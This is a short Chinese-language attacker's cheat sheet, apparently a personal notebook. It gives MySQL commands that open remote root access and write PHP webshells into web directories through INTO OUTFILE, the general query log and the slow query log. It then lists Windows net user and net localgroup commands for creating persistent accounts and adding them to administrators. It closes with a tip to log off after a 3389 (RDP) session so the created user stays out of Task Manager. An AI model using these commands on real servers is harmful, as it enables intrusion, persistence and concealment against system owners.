MYSQL写入webshell、CMD提权命令
#自己记录整理
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION; #开启mysql远程访问
GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root"; #开启mysql远程访问
#利用安全日志
show variables like '%secure%'; #查看安全设置
#查看是否支持secure_file_priv
select '<?php ($_=@$_GET[2]).@$_($_POST[1])?>' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\xx.php'; # 如果支持就可以 写入webshell
#利用普通日志
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = 'E:/study/WWW/evil.php'; #设置日志目录为shell地址
select '<?php eval($_GET[g]);?>' #写入shell
set global general_log=off; #关闭general log模式
#利用慢查询日志 slow_query_log
show variables like "%log%"; # 查看日志
show variables like "%long%"; #查看超过多少时间的为慢查询,则被日志记录;
set global slow_query_log="on"; #开启慢查询日志
set global slow_query_log_flie="D:/phpStudy/PHPTutorial/WWW/xx.php"; #日志记录地址
select "<php eval($_POST['p'])>" from user where sleep(11); #超过10s被日志记录 user表必须存在
添加一个指定用户名和密码的用户,/expires:never 表示帐户永不过期;
net user 用户名 密码 /add /expires:never
删除用户。
net user 用户名 /delete
将用户加入到指定的组中。
net localgroup 组 用户名 /add #加入组中
net localgroup 组 用户 /delete #从组中删除
将域用户添加到管理员组/从管理员组删除
net localgroup administrators 域\用户 /add
net localgroup administrators 域\用户 /delete
net user myuser /active:no 禁用 myuser 用户
net user myuser /active:yes 激活 myuser 用户
net user myuser /passwordchg:yes 用户 myuser 可以改变密码
net user myuser /passwordreq:yes 用户 myuser 必须拥有密码
net user myuser /expires:never 用户 myuser 永不过期
3389连接后 注销登录退出 不然任务管理器里面可以看到你创建的用户